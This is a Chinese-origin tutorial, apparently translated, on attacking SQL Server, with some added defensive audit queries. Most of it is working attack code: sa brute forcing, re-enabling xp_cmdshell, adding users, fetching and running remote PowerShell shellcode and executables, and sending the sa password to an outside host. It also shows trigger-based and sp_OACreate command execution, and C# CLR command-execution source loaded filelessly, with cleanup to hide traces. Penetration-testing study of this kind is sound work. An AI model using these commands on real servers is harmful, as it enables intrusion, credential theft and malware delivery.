SQL Server Database Attack and Defense in Detail (Part 1)

Contents
  1. SQL Server overview
    1.1. Client/server database systems
    1.2. The TDS protocol
  2. SQL Server brute forcing
  3. Dangerous SQL Server stored procedures
    3.1. xp_cmdshell
    3.2. xp_regread
    3.3. xp_fileexist
    3.4. xp_getnetname
    3.5. xp_msver
    3.6. xp_fixeddrives
  4. SQL Server triggers
  5. SQL Server COM components
    5.1. SP_OACREATE
    5.2. Enabling SP_OACREATE
    5.3. Executing commands with SP_OACREATE
  6. SQL Server CLR exploitation
    6.1. Creating a CLR assembly
    6.2. Importing the assembly with SQL
    6.3. Executing commands through the CLR
    6.4. WarSQLKit
    6.5. Importing the WarSQLKit DLL
    6.6. Executing commands with WarSQLKit
  7. R and Python in SQL Server
    7.1. R scripts
    7.2. Python scripts
  8. Scheduled tasks through SQL Server Agent
    8.1. Starting the SQL Server Agent service
    8.2. Creating a job

by Tahir 2021.3.5

SQL Server overview

SQL Server is a relational database management system (RDBMS) developed by Microsoft and one of the most widely deployed DBMSs on the market. It is used for everything from the content of a personal blog to customer records.

Before the 2017 release SQL Server ran only on Windows. One of the biggest changes in SQL Server 2017 is that it also runs on Linux and in Docker containers, which means it can be run on a Mac through Docker.

SQL Server editions as described in the source material:

Edition             Description
Enterprise Edition  Runs only on Windows Server operating systems. Intended for large production database servers where speed and availability have high priority. Provides features such as replication and Online Analytical Processing (OLAP) services, which also add to the attack surface.
Standard Edition    Similar to Enterprise Edition but lacks Virtual Interface System Area Network (VI SAN) support and some advanced OLAP features.
Personal Edition    Intended for workstations and laptops rather than servers; designed for at most five database users.
Developer Edition   Aimed at developers; functionally similar to Enterprise Edition but not licensed for production use.

This table reflects the SQL Server 2000-era product line. Current releases ship as Enterprise, Standard, Web, Developer and Express editions; Express is the one most often found bundled with applications, and it is the edition that lacks SQL Server Agent (see the scheduled-task section).

Client/server database systems

SQL Server is a client/server database management system. Many different clients can be connected to one SQL Server at the same time, each through a different tool.

For example, one client may use a graphical tool such as SQL Server Management Studio (SSMS) while another uses a command-line tool such as sqlcmd. At the same time a web application can connect to SQL Server from its web server, and any number of other clients can connect with their own tools for their own purposes.

The main advantage of a client/server DBMS is that multiple users can work with it concurrently, each with a specific level of access. If the database administrator has configured permissions properly, a client that connects to SQL Server can only reach the databases it has been granted, and can only perform the tasks it has been allowed to. All of this is enforced inside SQL Server itself, which is why the server-side configuration covered in the rest of this article matters so much.

The TDS protocol

Tabular Data Stream (TDS) is the application-layer protocol spoken between a database server and its clients. It is used by Microsoft SQL Server and by Sybase's database products. Every login, query and result set, including the brute-force attempts discussed below, travels inside TDS packets; whether the stream is TLS-encrypted is negotiated in the PRELOGIN exchange at the start of each connection.

Mapping of TDS protocol versions to SQL Server releases:

TDS version  Supported products
4.2          Sybase SQL Server < 10 and Microsoft SQL Server 6.5
5.0          Sybase SQL Server >= 10
7.0          Microsoft SQL Server 7.0
7.1          Microsoft SQL Server 2000
7.2          Microsoft SQL Server 2005

The FreeTDS table above stops at 2005. SQL Server 2008 and 2008 R2 negotiate TDS 7.3, and SQL Server 2012 and later negotiate TDS 7.4.

For a detailed analysis of the protocol structure see: http://freetds.cvs.sourceforge.net/checkout/freetds/freetds/doc/tds.html
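As an added example (not part of the original article), the query below uses sys.dm_exec_connections to show what each live session actually negotiated over TDS: the protocol version, the transport, the authentication scheme and whether the stream is encrypted. It needs VIEW SERVER STATE. The hex decoding of protocol_version in the comment, and the use of the undocumented xp_instance_regread to read the instance's ForceEncryption setting, are the added parts; the registry path is the standard SuperSocketNetLib location.

```sql
-- Added example, not from the original article. Which TDS version, transport and
-- authentication scheme each current session negotiated, and whether it is encrypted.
-- Needs VIEW SERVER STATE.
SELECT
    c.session_id,
    s.login_name,
    s.program_name,
    c.net_transport,                                  -- TCP, Named pipe, Shared memory
    c.protocol_type,                                  -- TSQL for ordinary TDS clients
    CONVERT(varbinary(4), c.protocol_version) AS tds_version,  -- high byte is the TDS major, e.g. 0x74000004 = TDS 7.4
    c.encrypt_option,                                 -- TRUE only when the whole stream is TLS-protected
    c.auth_scheme,                                    -- SQL (password in the LOGIN7 packet), NTLM or KERBEROS
    c.client_net_address
FROM sys.dm_exec_connections AS c
JOIN sys.dm_exec_sessions    AS s ON s.session_id = c.session_id
WHERE c.protocol_type = 'TSQL'
ORDER BY c.encrypt_option, c.session_id;

-- Server-side policy: 0 means a client may negotiate ENCRYPT_OFF in PRELOGIN, so only the
-- login packet is protected and every later query and result set crosses the wire in clear.
-- xp_instance_regread is undocumented but rewrites the path to the current instance.
EXEC master.dbo.xp_instance_regread
    N'HKEY_LOCAL_MACHINE',
    N'SOFTWARE\Microsoft\Microsoft SQL Server\MSSQLServer\SuperSocketNetLib',
    N'ForceEncryption';
```

Sessions with auth_scheme = SQL and encrypt_option = FALSE are the ones worth acting on: the password itself is protected during login even when encryption is off, but everything the session does afterwards is readable on the network.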

SQL Server brute forcing

SQL Server 2005 remote connection configuration (lab setup)

Download and install SQL Server 2005, then make the instance reachable over the network:

  • In SQL Server Management Studio set the server authentication mode to mixed mode, which enables the sa account.
  • Right-click the server node, Properties -> Connections, and allow remote connections to this server.
  • Right-click the server node, Facets -> Server Configuration, and set RemoteAccessEnabled to True.
  • In SQL Server Configuration Manager, under SQL Server Services, start both the SQL Server service and SQL Server Browser.
  • Under SQL Server Network Configuration open Protocols for MSSQLSERVER (SQLEXPRESS for an Express install), enable TCP/IP and set the IP addresses and port; leave VIA disabled and enable the other protocols.
  • In Windows Firewall -> Advanced settings -> Inbound Rules create a new port rule for TCP 1433, accept the defaults and give it a name. Switching the firewall off entirely also works but is not recommended.

Once the instance listens on TCP 1433 and the firewall allows it, it can be reached remotely, which also makes it reachable by a password-guessing scanner.

Brute forcing with Metasploit

use auxiliary/scanner/mssql/mssql_login

The module defaults to username sa and port 1433; set RHOSTS, and USER_FILE/PASS_FILE (or PASSWORD for a single guess) before running it. SQL Server does not throttle failed logins by itself, so the scanner is limited only by THREADS and BRUTEFORCE_SPEED.
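As an added example (not part of the original article), these are the server-side checks that frame a brute-force attempt: which authentication mode is in force, which SQL logins are enabled and whether the Windows password and lockout policy applies to them, how many bad passwords each has accumulated, and the failed logins already written to the error log. The queries use only documented catalog views and functions, plus xp_readerrorlog, which is undocumented but present in every version.

```sql
-- Added example, not from the original article. What a defender (or an attacker with a
-- foothold) checks around SQL login brute forcing.

-- 1. Authentication mode: 1 = Windows authentication only, 0 = mixed mode (sa and other
--    SQL logins are accepted, which is what mssql_login needs).
SELECT SERVERPROPERTY('IsIntegratedSecurityOnly') AS windows_auth_only;

-- 2. Enabled SQL logins. is_policy_checked = 0 means the Windows password and lockout policy
--    does not apply, so the login can be guessed without ever locking out.
SELECT l.name,
       l.is_policy_checked,
       l.is_expiration_checked,
       LOGINPROPERTY(l.name, 'IsLocked')         AS is_locked,
       LOGINPROPERTY(l.name, 'BadPasswordCount') AS bad_password_count,
       LOGINPROPERTY(l.name, 'BadPasswordTime')  AS last_bad_password
FROM sys.sql_logins AS l
WHERE l.is_disabled = 0
ORDER BY bad_password_count DESC;

-- 3. Failed logins in the current error log (log 0, type 1 = SQL Server log). Failed logins
--    are audited by default; each entry carries the login name and client address.
EXEC master.dbo.xp_readerrorlog 0, 1, N'Login failed';
```

A SQL login only locks out when is_policy_checked = 1 and the host's account lockout policy is set; the engine itself never slows down a scanner, so the error log and the bad-password counters are the only native evidence of a spray.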

Dangerous SQL Server stored procedures

xp_cmdshell

Check whether the xp_cmdshell extended stored procedure exists

xtype is the object type; xtype = 'X' marks an extended stored procedure.

select * from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'

T-SQL to check whether xp_cmdshell is enabled

The batch reads the current value from sys.configurations and also records whether the instance is a failover cluster node. Note that @result is only non-zero on a clustered instance (1 = enabled, 2 = disabled); on a stand-alone server read @xp_cmdshell_available, which is returned as the second column.

declare @RunningOnACluster char(1)
declare @xp_cmdshell_available char(1)
declare @result int
set @xp_cmdshell_available = 'Y'
set @result = 0
-- is this instance a failover cluster node?
select @RunningOnACluster = case
    when convert(int, serverproperty('IsClustered')) = 1 then 'Y'
    else 'N'
end
-- sys.configurations reflects the live sp_configure state (value_in_use 0 = disabled)
if (0 = (select value_in_use from sys.configurations where name = 'xp_cmdshell'))
    set @xp_cmdshell_available = 'N'
-- @result: 0 = not clustered, 1 = clustered and enabled, 2 = clustered and disabled
if @RunningOnACluster = 'Y'
begin
    if @xp_cmdshell_available = 'Y'
        select @result = 1
    if @xp_cmdshell_available = 'N'
        select @result = 2
end
select @result as cluster_result, @xp_cmdshell_available as xp_cmdshell_enabled

Restoring the xp_cmdshell stored procedure

This fixes the error "Could not find stored procedure 'master..xp_cmdshell'", which appears when the extended procedure has been dropped as a hardening measure. Both steps require sysadmin.

Step 1: drop first

drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'

Step 2: restore

dbcc addextendedproc("sp_oacreate","odsole70.dll")
dbcc addextendedproc("xp_cmdshell"," ")

Direct restore, regardless of whether sp_addextendedproc still exists. xplog70.dll must be present in the instance's Binn directory (upload it yourself if it was deleted); the statement that re-registers the xp_cmdshell extended procedure is:

dbcc addextendedproc("xp_cmdshell","xplog70.dll")

Check a series of extended procedures and restore any that are missing:

if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]'))
dbcc addextendedproc ('xp_cmdshell','xplog70.dll')
if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[xp_dirtree]'))
dbcc addextendedproc ('xp_dirtree','xpstar.dll')
if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[xp_fixeddrives]'))
dbcc addextendedproc ('xp_fixeddrives','xpstar.dll')
if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[xp_regwrite]'))
dbcc addextendedproc ('xp_regwrite','xpstar.dll')
if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[xp_regread]'))
dbcc addextendedproc ('xp_regread','xpstar.dll')

Enabling xp_cmdshell

Re-registering the procedure is not enough on SQL Server 2005 and later; it is also disabled by the surface-area configuration and must be switched on with sp_configure:

EXEC sp_configure 'show advanced options', 1; RECONFIGURE; exec SP_CONFIGURE 'xp_cmdshell', 1; RECONFIGURE;

Disabling xp_cmdshell

Turn the configuration option off:

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 0;RECONFIGURE;

Statement that drops xp_cmdshell altogether:

exec sp_dropextendedproc 'xp_cmdshell';

Dropping and re-adding xp_cmdshell; xplog70.dll must be uploaded again if it was removed with the procedure:

drop procedure xp_cmdshell;
exec sp_addextendedproc "xp_cmdshell", "xplog70.dll";

Appendix: registration statements for the extended procedures and the DLLs that implement them

exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
exec sp_addextendedproc xp_enumgroups ,@dllname ='xplog70.dll'
exec sp_addextendedproc xp_loginconfig ,@dllname ='xplog70.dll'
exec sp_addextendedproc xp_enumerrorlogs ,@dllname ='xpstar.dll'
exec sp_addextendedproc xp_getfiledetails ,@dllname ='xpstar.dll'
exec sp_addextendedproc Sp_OACreate ,@dllname ='odsole70.dll'
exec sp_addextendedproc Sp_OADestroy ,@dllname ='odsole70.dll'
exec sp_addextendedproc Sp_OAGetErrorInfo ,@dllname ='odsole70.dll'
exec sp_addextendedproc Sp_OAGetProperty ,@dllname ='odsole70.dll'
exec sp_addextendedproc Sp_OAMethod ,@dllname ='odsole70.dll'
exec sp_addextendedproc Sp_OASetProperty ,@dllname ='odsole70.dll'
exec sp_addextendedproc Sp_OAStop ,@dllname ='odsole70.dll'
exec sp_addextendedproc xp_regaddmultistring ,@dllname ='xpstar.dll'
exec sp_addextendedproc xp_regdeletekey ,@dllname ='xpstar.dll'
exec sp_addextendedproc xp_regdeletevalue ,@dllname ='xpstar.dll'
exec sp_addextendedproc xp_regenumvalues ,@dllname ='xpstar.dll'
exec sp_addextendedproc xp_regremovemultistring ,@dllname ='xpstar.dll'
exec sp_addextendedproc xp_regwrite ,@dllname ='xpstar.dll'
exec sp_addextendedproc xp_dirtree ,@dllname ='xpstar.dll'
exec sp_addextendedproc xp_regread ,@dllname ='xpstar.dll'
exec sp_addextendedproc xp_fixeddrives ,@dllname ='xpstar.dll'

Executing operating system commands with xp_cmdshell

The command runs as the SQL Server service account (or as the xp_cmdshell proxy account for non-sysadmin callers), and its standard output comes back as a result set, one row per line.

Run whoami. The three forms are equivalent; the double-quoted ones only parse when SET QUOTED_IDENTIFIER is OFF, because otherwise double quotes delimit identifiers.

exec master.dbo.xp_cmdshell 'whoami'
exec master.dbo.xp_cmdshell "whoami"
exec xp_cmdshell "whoami";

Run ipconfig /all

exec master..xp_cmdshell 'ipconfig/all'

Query the operating system name and version (English and Chinese systems respectively)

exec master..xp_cmdshell 'systeminfo | findstr /B /C:"OS Name" /C:"OS Version"'
exec master..xp_cmdshell 'systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本"'

Gather system information with wmic through xp_cmdshell

exec master..xp_cmdshell 'wmic cpu get name,NumberOfCores,NumberOfLogicalProcessors/Format:List'

Read the RDP port from the registry with reg query (the " " inside the key path keeps the space in "Terminal Server" while the whole command stays inside one single-quoted T-SQL string)

exec master..xp_cmdshell 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber'

Add the user testuser1 without returning output

exec master..xp_cmdshell 'Net user testuser1 passwd1 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add',NO_OUTPUT

Delete the user testuser1 without returning output

EXEC master..xp_cmdshell 'net user testuser1 /delete', NO_OUTPUT

Kill taskmgr.exe with taskkill. taskmgr.exe is Task Manager, which lists the processes running on the system; it is opened with Ctrl+Alt+Del (the Windows Security screen, then "Task Manager") or Ctrl+Shift+Esc. It is not a core system process, but terminating it on a user's desktop can have unpredictable side effects and is very noticeable.

exec master.dbo.xp_cmdshell 'taskkill /f /im taskmgr.exe';

Create a directory with mkdir

exec master..xp_cmdshell 'mkdir "C:\test\" '

Run dir

exec master..xp_cmdshell 'dir c:\'
exec xp_cmdshell 'dir c:\'

Delete files. Given a directory, del asks for confirmation, which cannot be answered through xp_cmdshell, so pass a file path or add /q.

exec master..xp_cmdshell 'del C:\test';

Calling PowerShell from xp_cmdshell

Download http://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1 with PowerShell and run it in memory (the doubled single quotes are T-SQL escaping for the quotes inside the PowerShell command):

exec xp_cmdshell 'powershell -c "iex((new-object Net.WebClient).DownloadString(''http://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1''))"'

Write a small VBScript downloader to C:/ProgramData/vget.vbs with echo; ^" is the cmd escape that keeps the double quotes literal in the written file:

exec master..xp_cmdshell 'echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s = CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 > C:/ProgramData/vget.vbs';

Exfiltrate the database connection details (host, port, the sa login and its password) to an external host through a PowerShell WebClient.OpenRead GET request:

exec xp_cmdshell 'powershell (new-object System.Net.WebClient).OpenRead(''http://example/test.jsp?data=127.0.0.1%7c1433%7csa%7cDb123456'')'

Write a two-line PowerShell downloader to %TEMP%, fetch test0.exe with it and launch the binary through WMI:

exec master..xp_cmdshell '"echo $client = New-Object System.Net.WebClient > %TEMP%\test.ps1 & echo $client.DownloadFile("http://example/test0.exe","%TEMP%\test.exe") >> %TEMP%\test.ps1 & powershell  -ExecutionPolicy Bypass  %temp%\test.ps1 & WMIC process call create "%TEMP%\test.exe""'

xp_regread

SQL Server ships a family of extended stored procedures that read, write and delete registry keys and values: xp_regread, xp_regwrite, xp_regdeletevalue, xp_regdeletekey, xp_regaddmultistring, xp_regenumkeys and so on. They run in the security context of the SQL Server service account, so HKEY_CURRENT_USER refers to that account's hive, and writes to HKEY_LOCAL_MACHINE succeed whenever the service account can write there.

Read the registry

exec xp_regread 'HKEY_current_user','Control Panel\International','sCountry'
exec xp_regread N'HKEY_LOCAL_MACHINE', N'SYSTEM\CurrentControlSet\Services\MSSEARCH'

Enumerate the subkeys under a key

exec xp_regenumkeys 'HKEY_CURRENT_USER','Control Panel\International'

xp_fileexist

Checks whether a path exists. The first result column (File Exists) is 1 when the file exists and 0 when it does not; the remaining columns report whether the path is a directory and whether the parent directory exists. After running a command that returns no output, the usual pattern is to redirect its result into a file and use this procedure to confirm the command actually ran.

Check whether a file exists (T-SQL does not treat backslash as an escape character, so single backslashes are enough)

exec xp_fileexist 'C:\test\test.txt'

List the subdirectories of a directory

exec xp_subdirs 'C:\'

xp_getnetname

Get the server's network name

exec xp_getnetname

xp_msver

Get version and build information about the server

exec xp_msver

xp_fixeddrives

Get the free space on each fixed drive, in MB

exec xp_fixeddrives

For reference, a list of commonly abused extended stored procedures; look up each one's function and usage as needed.

xp_cmdshell
xp_dirtree
xp_enumgroups
xp_fixeddrives
xp_loginconfig
xp_enumerrorlogs
xp_getfiledetails
Sp_OACreate
Sp_OADestroy
Sp_OAGetErrorInfo
Sp_OAGetProperty
Sp_OAMethod
Sp_OASetProperty
Sp_OAStop
Xp_regaddmultistring
Xp_regdeletekey
Xp_regdeletevalue
Xp_regenumvalues
Xp_regread
Xp_regremovemultistring
Xp_regwrite
sp_makewebtask

SQL Server triggers

A SQL Server trigger runs T-SQL after a specified action on a table, for example on UPDATE. A trigger body can call xp_cmdshell, which turns an ordinary data change by an application into operating-system command execution. The body runs with the permissions of the login that fires it unless the trigger is created WITH EXECUTE AS, so xp_cmdshell must be enabled and the caller (or the impersonated principal) must be allowed to run it.

First create a table named test and insert some rows.

Then create a trigger named test1 that fires xp_cmdshell whenever the test table is updated:

set ANSI_NULLS on
go
set QUOTED_IDENTIFIER on
go
create trigger [test1]
on [test]
AFTER UPDATE as
begin
    execute master..xp_cmdshell 'cmd.exe /c calc.exe'
end
go

Run the following update against the test table and the test1 trigger fires.

UPDATE test SET name = 'wangwu' WHERE LastName = 'zhangsan'
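As an added example (not part of the original article), this batch hunts for triggers like test1 across every database, plus server-scoped DDL and LOGON triggers, by searching their definitions for the procedures covered in this article. It uses sp_MSforeachdb, which is undocumented but present in every version; LIKE is case-insensitive under a case-insensitive collation. Triggers created WITH ENCRYPTION have a NULL definition and are reported as findings in their own right.

```sql
-- Added example, not from the original article. Find DML triggers in every database, and
-- server-level triggers, whose body calls xp_cmdshell, sp_OACreate, external scripts or
-- xp_regwrite. A NULL definition means WITH ENCRYPTION (or a CLR trigger), flag it too.
CREATE TABLE #hits (db sysname, trig sysname, parent sysname NULL, is_disabled bit, definition nvarchar(max) NULL);

EXEC sp_MSforeachdb N'
USE [?];
INSERT INTO #hits
SELECT DB_NAME(), t.name, OBJECT_NAME(t.parent_id), t.is_disabled, m.definition
FROM sys.triggers AS t
LEFT JOIN sys.sql_modules AS m ON m.object_id = t.object_id
WHERE m.definition IS NULL
   OR m.definition LIKE ''%xp_cmdshell%''
   OR m.definition LIKE ''%sp_oacreate%''
   OR m.definition LIKE ''%sp_execute_external_script%''
   OR m.definition LIKE ''%xp_regwrite%'';';

-- Server-scoped (DDL and LOGON) triggers use a separate catalog.
INSERT INTO #hits
SELECT N'master', t.name, N'(server)', t.is_disabled, m.definition
FROM sys.server_triggers AS t
LEFT JOIN sys.server_sql_modules AS m ON m.object_id = t.object_id
WHERE m.definition IS NULL
   OR m.definition LIKE '%xp_cmdshell%'
   OR m.definition LIKE '%sp_oacreate%';

SELECT db, trig, parent, is_disabled, LEFT(definition, 200) AS definition_head
FROM #hits;
DROP TABLE #hits;

-- Containment for the article's test1 trigger: disable first, drop once reviewed.
-- DISABLE TRIGGER [test1] ON [test];
-- DROP TRIGGER [test1];
```

sys.triggers also lists database-scoped DDL triggers (parent_id 0, so the parent column is NULL); those are worth reading in full, since they fire on schema changes rather than on data.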

SQL Server COM components

The OLE Automation procedures in SQL Server, SP_OACREATE and its siblings, can execute system commands. This route returns no output, so the command's output has to be redirected to a file and read back separately.

SP_OACREATE

Check the state of SP_OACREATE.

select * from master.dbo.sysobjects where xtype='x' and name='SP_OACREATE'

Use count(*) to test for existence; 1 means the procedure is present.

select count(*) from master.dbo.sysobjects where xtype='x' and name='SP_OACREATE'

Enabling SP_OACREATE

Enable the Ole Automation Procedures option with sp_configure (requires ALTER SETTINGS, which sysadmin and serveradmin hold):

exec sp_configure 'show advanced options', 1; RECONFIGURE WITH OVERRIDE;   
exec sp_configure 'Ole Automation Procedures', 1; RECONFIGURE WITH OVERRIDE;

Executing commands with SP_OACREATE

Execute a system command by instantiating WScript.Shell and calling its Run method; the redirect captures the output for later retrieval, and sp_OADestroy releases the COM object.

declare @shell int
exec sp_oacreate 'wscript.shell', @shell output
exec sp_oamethod @shell, 'run', null, 'C:\Windows\System32\cmd.exe /c whoami /all >C:\\test\test.txt'
exec sp_oadestroy @shell

SQL Server CLR exploitation

Microsoft calls the CLR the Common Language Runtime. Starting with SQL Server 2005 (9.x), SQL Server hosts the .NET Framework CLR for Microsoft Windows, which means stored procedures, triggers, user-defined types, user-defined functions, user-defined aggregates and streaming table-valued functions can be written in any .NET Framework language, including Microsoft Visual Basic .NET and Microsoft Visual C#.

Official documentation: https://docs.microsoft.com/zh-cn/sql/relational-databases/clr-integration/common-language-runtime-clr-integration-programming-concepts?view=sql-server-ver15

When using an MSSQL service for command execution, the usual approach is xp_cmdshell, which runs operating system commands in the context of the MSSQL process. Running custom code through that route normally means relying on LOLBINs, adding a new operating system user, or writing a binary to disk with BCP, all of which are easy to detect. With CLR integration the DLL can be imported as a hexadecimal byte stream, so no file is written to disk.

Creating a CLR assembly

Create a SQL Server Database Project in Visual Studio.

Change the target platform and tick the option to generate a deployment script.

The ability to run .NET code from MSSQL arrived in SQL Server 2005, and later versions layered protections on top of it that limit what the code can reach. Every .NET assembly is assigned a permission level when it is created, for example:

CREATE ASSEMBLY SQLCLRTest  
FROM 'C:\MyDBApp\SQLCLRTest.dll'
WITH PERMISSION_SET = SAFE;

The permission set has three options:

SAFE: essentially exposes only the MSSQL data set to the code; most other operations are forbidden.

EXTERNAL_ACCESS: allows access to certain resources on the underlying server, but is not meant to allow direct code execution.

UNSAFE: allows any code.

Microsoft's detailed documentation on SQL CLR is available at: https://docs.microsoft.com/en-us/dotnet/framework/data/adonet/sql/introduction-to-sql-server-clr-integration

Set the target framework to match the server's hosted CLR (a .NET Framework 4.x target for SQL Server 2012 and later; SQL Server CLR integration does not host .NET Core) and set the permission level to UNSAFE.

Add a SQL CLR C# stored procedure to the project.

Write the code:

using System;
using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;
using System.Diagnostics;
using System.Text;
using Microsoft.SqlServer.Server;

public partial class StoredProcedures
{
    // Entry point exposed to T-SQL through CREATE PROCEDURE ... AS EXTERNAL NAME.
    // Spawning a process is why the assembly must be loaded with PERMISSION_SET = UNSAFE.
    [Microsoft.SqlServer.Server.SqlProcedure]
    public static void ExecCommand(string cmd)
    {
        SqlContext.Pipe.Send("Command is running, please wait.");
        SqlContext.Pipe.Send(RunCommand("cmd.exe", " /c " + cmd));
    }

    // Runs a program with stdout/stderr redirected and returns its standard output.
    public static string RunCommand(string filename, string arguments)
    {
        var process = new Process();

        process.StartInfo.FileName = filename;
        if (!string.IsNullOrEmpty(arguments))
        {
            process.StartInfo.Arguments = arguments;
        }

        process.StartInfo.CreateNoWindow = true;
        process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
        process.StartInfo.UseShellExecute = false;   // required for stream redirection

        process.StartInfo.RedirectStandardError = true;
        process.StartInfo.RedirectStandardOutput = true;
        var stdOutput = new StringBuilder();
        process.OutputDataReceived += (sender, args) => stdOutput.AppendLine(args.Data);
        string stdError = null;
        try
        {
            process.Start();
            process.BeginOutputReadLine();             // read stdout asynchronously to avoid a pipe deadlock
            stdError = process.StandardError.ReadToEnd();
            process.WaitForExit();
        }
        catch (Exception e)
        {
            // Start() failed (bad path, access denied); ExitCode is not valid here, so stop
            SqlContext.Pipe.Send(e.Message);
            return string.Empty;
        }

        if (process.ExitCode == 0)
        {
            SqlContext.Pipe.Send(stdOutput.ToString());
        }
        else
        {
            var message = new StringBuilder();

            if (!string.IsNullOrEmpty(stdError))
            {
                message.AppendLine(stdError);
            }

            if (stdOutput.Length != 0)
            {
                message.AppendLine("Std output:");
                message.AppendLine(stdOutput.ToString());
            }
            SqlContext.Pipe.Send(filename + arguments + " finished with exit code = " + process.ExitCode + ": " + message);
        }
        return stdOutput.ToString();
    }
}

Build the project to produce the DLL.

Running code at the SAFE permission level only requires CLR integration to be enabled. Running code marked EXTERNAL_ACCESS or UNSAFE requires additional configuration changes and DBA (sysadmin) rights. The steps for running a CLR assembly marked UNSAFE differ between server versions before and after 2017, so they are described separately.

SQL Server versions before 2017

Show advanced options:

sp_configure 'show advanced options',1;RECONFIGURE

Enable CLR integration:

sp_configure 'clr enabled',1;RECONFIGURE;

Mark the database that will hold the .NET assembly as trustworthy:

ALTER DATABASE master SET TRUSTWORTHY ON;

SQL Server 2017 and later

SQL Server 2017 introduced the 'clr strict security' option, which is on by default and treats every assembly as UNSAFE regardless of its declared permission set. Either that option is disabled (sp_configure 'clr strict security', 0), or, as below, the individual assembly is allow-listed by its SHA-512 hash, which avoids marking a whole database as trustworthy. For SQL Server 2017 and later the steps are:

Show advanced options:

sp_configure 'show advanced options',1;RECONFIGURE

Enable CLR integration:

sp_configure 'clr enabled',1;RECONFIGURE;

Add the SHA-512 hash of the assembly to the trusted assembly list:

sp_add_trusted_assembly @hash= <SHA512 of DLL>;

From this point on, creating and calling the assembly works the same way on every SQL Server version.

Create the assembly from a hexadecimal string. Because the assembly can be created from a hex string, there is no need to produce a binary and write it somewhere the SQL Server process can read:

CREATE ASSEMBLY clrassem from <HEX STRING> WITH PERMISSION_SET = UNSAFE;

Create a stored procedure that runs the code in the assembly:

CREATE PROCEDURE debugrun AS EXTERNAL NAME clrassem.StoredProcedures.runner;

Run the stored procedure:

debugrun

After the code has run, the stored procedure, the assembly and the trusted hash can be dropped and the security settings changed earlier restored to their previous values. Example SQL for that clean-up follows.

For SQL Server 2017 and later:

sp_drop_trusted_assembly @hash=<SHA512 of DLL>

For versions before 2017:

ALTER DATABASE <CONNECTED DATABASE> SET TRUSTWORTHY OFF;

For all versions:

DROP PROCEDURE debugrun;
DROP ASSEMBLY clrassem;
sp_configure 'clr strict security',1;RECONFIGURE
sp_configure 'show advanced options',0;RECONFIGURE

Importing the assembly with SQL

The DLL can now be imported as a hexadecimal byte stream, so nothing is written to the server's disk. The full hex dump of the compiled DLL (every DLL starts with the MZ header bytes 4D5A) goes after FROM:

CREATE ASSEMBLY [Database1]
AUTHORIZATION [dbo]
FROM 0x4D5A...
WITH PERMISSION_SET = UNSAFE;
GO

Create the stored procedure

CREATE PROCEDURE [dbo].[ExecCommand]
@cmd NVARCHAR (MAX)
AS EXTERNAL NAME [Database1].[StoredProcedures].[ExecCommand]
go

Executing commands through the CLR

exec dbo.ExecCommand 'whoami /all';
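As an added example (not part of the original article), the batch below fills in the two pieces the procedure above leaves to the reader: producing the 0x... literal from the compiled DLL and computing the SHA-512 hash that sp_add_trusted_assembly expects on SQL Server 2017 and later. The build path and assembly name are assumptions. OPENROWSET(BULK) reads from the disk of the instance running the batch and needs ADMINISTER BULK OPERATIONS, so the literal is generated on a machine you control and only the literal is pasted into the statement sent to the target.

```sql
-- Added example, not from the original article. DLL on disk -> hex literal + SHA-512 ->
-- trusted-assembly entry (2017+) -> CREATE ASSEMBLY -> verification.
DECLARE @dll  varbinary(max), @hash varbinary(64), @hex nvarchar(max), @sql nvarchar(max);

SELECT @dll = BulkColumn
FROM OPENROWSET(BULK 'C:\build\Database1.dll', SINGLE_BLOB) AS f;   -- assumed build path

SET @hash = HASHBYTES('SHA2_512', @dll);        -- varbinary(max) input is accepted from SQL Server 2016
SET @hex  = CONVERT(nvarchar(max), @dll, 1);    -- style 1 keeps the 0x prefix: N'0x4D5A9000...'

SELECT DATALENGTH(@dll) AS dll_bytes, @hash AS sha512, LEFT(@hex, 20) + N'...' AS literal_head;

-- 2017+: allow-list exactly this build. With 'clr strict security' on, CREATE ASSEMBLY is
-- refused unless the hash is listed or the DLL is signed by a key holding UNSAFE ASSEMBLY.
IF OBJECT_ID(N'sys.trusted_assemblies') IS NOT NULL
BEGIN
    IF NOT EXISTS (SELECT 1 FROM sys.trusted_assemblies WHERE hash = @hash)
        EXEC sys.sp_add_trusted_assembly @hash = @hash, @description = N'Database1 ExecCommand';
END

-- Splice the literal into the article's CREATE ASSEMBLY statement and run it.
SET @sql = N'CREATE ASSEMBLY [Database1] AUTHORIZATION [dbo] FROM ' + @hex
         + N' WITH PERMISSION_SET = UNSAFE;';
EXEC sys.sp_executesql @sql;

-- Confirm what was loaded and that the stored bytes still hash to the trusted value.
SELECT a.name, a.permission_set_desc, a.create_date,
       HASHBYTES('SHA2_512', af.content) AS stored_sha512
FROM sys.assemblies AS a
JOIN sys.assembly_files AS af ON af.assembly_id = a.assembly_id AND af.file_id = 1
WHERE a.name = N'Database1';
```

The last query is also the defender's view: sys.assembly_files keeps the full bytes of every loaded assembly, so a stored assembly can be hashed and matched against sys.trusted_assemblies, or exported for analysis, long after the hex literal that created it has scrolled out of any log.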

WarSQLKit

WarSQLKit is a tool for exploiting MSSQL CLR integration. It comes in two builds:

  • WarSQLKit, the full build with many built-in functions.
  • WarSQLKitMinimal, a minimal build that only executes commands.

